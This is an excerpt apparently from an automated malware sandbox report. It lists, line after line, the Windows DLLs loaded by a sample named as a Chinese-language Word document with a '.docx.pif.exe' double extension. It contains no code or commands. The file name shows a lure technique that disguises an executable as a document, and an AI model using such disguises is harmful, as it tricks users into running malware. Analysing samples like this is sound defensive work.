Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: netapi32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: smartscreenps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: nltdll.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: nltdll.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ieproxy.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ieproxy.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: ieproxy.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: mssip32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: mssip32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: mssip32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: smartscreenps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: smartscreenps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: smartscreenps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: winhttpcom.dll | Jump to behavior |
